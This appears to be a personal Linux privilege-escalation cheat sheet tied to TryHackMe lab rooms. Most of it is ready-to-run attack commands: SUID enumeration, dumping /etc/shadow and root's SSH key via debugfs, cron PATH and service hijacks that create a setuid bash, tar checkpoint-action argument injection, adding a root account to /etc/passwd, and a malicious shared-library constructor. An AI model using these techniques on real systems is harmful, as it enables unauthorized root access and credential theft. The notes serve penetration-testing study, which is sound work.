Privilege Escalation
PrivEsc: Exploits
- Identify the kernel version
- Search and find an exploit code for the kernel version of the target system
- Run the exploit
PrivEsc: Sudo
sudo -l
- https://gtfobins.github.io/
- Leverage LD_PRELOAD
- Use can run script as other user
sudo -u <user-name> /opt/script/script.sh
PrivEsc: root
PrivEsc: Pass
- check /etc/passwd - for passwords
- check history files - for passwords
- check /var/backups/ - for passwords
- check each home dir - for passwords
PrivEsc: SUID
If the SUID permissions are set, the binary will run with the permissions of the file owner, check https://gtfobins.github.io/
find / -type f -perm -04000 -ls 2>/dev/null
find / -perm -4000 2>/dev/null
find / -type f -perm -04000 -ls 2>/dev/null
find / -perm -4000 2>/dev/null
find / -type f -perm -u=s 2>/dev/null
find / -type f -a \( -perm -u+s -o -perm -g+s \) -exec ls -l {} \; 2> /dev/null
PrivEsc: Capabilities
check https://gtfobins.github.io/
PrivEsc: Interesting groups
Disk Group
This privilege is almost equivalent to root access as you can access all the data inside of the machine.
df -h #Find where "/" is mounted
debugfs /dev/sda1
debugfs: cd /root
debugfs: ls
debugfs: cat /root/.ssh/id_rsa
debugfs: cat /etc/shadow
Other
https://book.hacktricks.xyz/linux-hardening/privilege-escalation/interesting-groups-linux-pe
PrivEsc: Ld_preload
sudo -l
- http://michalszalkowski.com/security/linux/leverage-ld-preload/
PrivEsc: Cron - Overwrite script
- Check perminission of script that is executed, if you can overwrite it, you win
PrivEsc: Cron - Overwrite path
check cron configuration, pay attention to PATH
- path start with /home/user
cat /etc/crontab
#-> PATH=/home/user:/usr/local/sbin:/usr/local/bin:/sbin:/bin:/usr/sbin:/usr/bin <--
#-> * * * * * root script.sh <-
check the location of script.sh
- the location of script is /usr/local/bin/
- that mean if you put script.sh upper in hierarchy it will be executed instead of orginal
crete new script.sh in /home/user
echo 'cp /bin/bash /tmp/bash; chmod +s /tmp/bash' > /home/user/script.sh
chmod +x /home/user/script.sh
waith for cron job
PrivEsc: PATH
- What folders are located under $PATH
- Does your current user have write privileges for any of these folders?
- Can you modify $PATH?
- Is there a script/application you can start that will be affected by this vulnerability?
PrivEsc: TAR
echo 'cp /bin/bash /tmp/bash' > runme.sh
echo 'chmod +s /tmp/bash' >> runme.sh
echo "" > "--checkpoint-action=exec=sh runme.sh"
echo "" > --checkpoint=1
chmod +x runme.sh
PrivEsc: NFS
- run
- check if any share has no_root_squash
- if yes mount that share
-
create
nfs.c
file in that share -
compile
- go to target machine and execute nfs
PrivEsc: Writable files
/etc/passwd
Generate a password with one of the following commands.openssl passwd -1 -salt hacker hacker
# mkpasswd -m SHA-512 hacker
# python2 -c 'import crypt; print crypt.crypt("hacker", "$6$salt")'
echo 'hacker:GENERATED_PASSWORD_HERE:0:0:Hacker:/root:/bin/bash' >> /etc/passwd
echo 'hacker:$1$hacker$TzyKlv0/R/c28R.GAeLw.1:0:0:Hacker:/root:/bin/bash' >> /etc/passwd
PrivEsc: Hijack shared library
find all binaris with suid
find / -type f -perm -04000 -ls 2>/dev/null
#-> 816078 12 -rwsr-sr-x 1 root staff 9861 May 14 2017 /usr/local/bin/suid-s
strace /usr/local/bin/suid-so 2>&1 | grep -i -E "open|access|no such file"
#-> open("/usr/lib/libstdc++.so.6", O_RDONLY) = 3
#-> open("/lib/libc.so.6", O_RDONLY) = 3
#-> open("/home/user/.config/libcalc.so", O_RDONLY) = -1 ENOENT (No such file or directory)
echo '#include <stdio.h>' > libcalc.c
echo '#include <stdlib.h>' >> libcalc.c
echo '' >> libcalc.c
echo 'static void inject() __attribute__((constructor));' >> libcalc.c
echo '' >> libcalc.c
echo 'void inject() {' >> libcalc.c
echo ' system("cp /bin/bash /tmp/bash && chmod +s /tmp/bash && /tmp/bash -p");' >> libcalc.c
echo '}' >> libcalc.c
PrivEsc: Hijack service
find all binaris with suid
find / -type f -perm -04000 -ls 2>/dev/null
#-> 816762 8 -rwsr-sr-x 1 root staff 6883 May 14 2017 /usr/local/bin/suid-env
strings /usr/local/bin/suid-env
#-> fffff.
#-> l$ L
#-> t$(L
#-> |$0H
#-> service apache2 start <- -------------------------- TARGET
echo 'int main() { setgid(0); setuid(0); system("/bin/bash"); return 0; }' > /tmp/service.c
cd /tmp
gcc /tmp/service.c -o /tmp/service
PrivEsc: Hijack service path
find all binaris with suid
find / -type f -perm -04000 -ls 2>/dev/null
#-> 816764 8 -rwsr-sr-x 1 root staff 6899 May 14 2017 /usr/local/bin/suid-env2
strings /usr/local/bin/suid-env2
#-> l$ L
#-> t$(L
#-> |$0H
#-> /usr/sbin/service apache2 start <- --------------------- TARGET
function /usr/sbin/service() { cp /bin/bash /tmp && chmod +s /tmp/bash && /tmp/bash -p; }
export -f /usr/sbin/service
Links
- https://tryhackme.com/room/linprivesc
- https://tryhackme.com/room/linuxprivescarena